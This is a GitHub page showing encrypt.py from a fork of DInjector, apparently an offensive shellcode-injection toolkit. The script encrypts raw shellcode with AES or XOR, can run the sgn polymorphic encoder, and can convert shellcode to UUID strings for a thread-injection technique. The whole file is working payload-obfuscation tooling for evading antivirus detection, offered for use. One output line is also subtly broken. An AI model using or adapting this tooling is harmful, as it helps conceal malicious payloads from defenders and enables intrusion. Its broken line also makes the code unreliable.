forked from snovvcrash/DInjector
-
Notifications
You must be signed in to change notification settings - Fork 17
/
Copy pathencrypt.py
executable file
·108 lines (83 loc) · 3.38 KB
/
encrypt.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
#!/usr/bin/env python3
import os
import uuid
import hashlib
from pathlib import Path
from base64 import b64encode
from argparse import ArgumentParser
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
class AES:
def __init__(self, password, iv):
self.key = hashlib.sha256(password.encode()).digest()
self.iv = iv
def encrypt(self, raw):
backend = default_backend()
padder = padding.PKCS7(128).padder()
raw = padder.update(raw) + padder.finalize()
cipher = Cipher(algorithms.AES(self.key), modes.CBC(self.iv), backend=backend)
encryptor = cipher.encryptor()
return self.iv + encryptor.update(raw) + encryptor.finalize()
class XOR:
def __init__(self, key):
self.key = key
def encrypt(self, raw):
output = b''
for i in range(len(raw)):
c = raw[i]
k = self.key[i % len(self.key)]
output += bytes([c ^ ord(k)])
return output
def parse_args():
parser = ArgumentParser()
parser.add_argument('shellcode_bin', action='store', type=str,
help='shellcode binary file path')
parser.add_argument('-p', '--password', action='store', type=str, required=True,
help='password to encrypt the shellcode with')
parser.add_argument('-a', '--algorithm', action='store', type=str, default='aes', choices=['aes', 'xor'],
help='algorithm to encrypt the shellcode with')
parser.add_argument('-o', '--output', action='store', type=str,
help='output file path')
parser.add_argument('--uuid', action='store_true', default=False,
help='convert the shellcode to UUID string before encrypting (used in "currentthreaduuid")')
parser.add_argument('--base64', action='store_true', default=False,
help='print the output in base64')
parser.add_argument('--sgn', action='store_true', default=False,
help='use the sgn encoder (https://github.com/EgeBalci/sgn/releases)')
parser.add_argument('--sgn-path', action='store', type=str, default=Path(__file__).resolve().parent / '3rd-party' / 'sgn',
help='path to the sgn encoder (https://github.com/EgeBalci/sgn/releases)')
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
shellcode_bin = args.shellcode_bin
if args.sgn:
os.system(f'{args.sgn_path} -a 64 {args.shellcode_bin}')
shellcode_bin += '.sgn'
with open(shellcode_bin, 'rb') as fd:
shellcode = fd.read()
if args.uuid:
if len(shellcode) % 16:
null_nytes = b'\x00' * (16 - (len(shellcode) % 16))
shellcode += null_nytes
concatedUuids = b''
for i in range(0, len(shellcode), 16):
uuid_str = str(uuid.UUID(bytes_le=shellcode[i:i+16]))
concatedUuids += uuid_str.encode() + b'|'
shellcode = concatedUuids
if args.algorithm == 'aes':
iv = os.urandom(16)
ctx = AES(args.password, iv)
elif args.algorithm == 'xor':
ctx = XOR(args.password)
enc = ctx.encrypt(shellcode)
if args.base64:
enc = b64encode(enc)
if args.output:
with open(args.output, 'wb') as fd:
fd.write(enc)
print(f'[+] Encrypted shellcode file: {args.output}')
elif args.base64:
print(enc).decode().strip()
if args.sgn:
os.remove(shellcode_bin)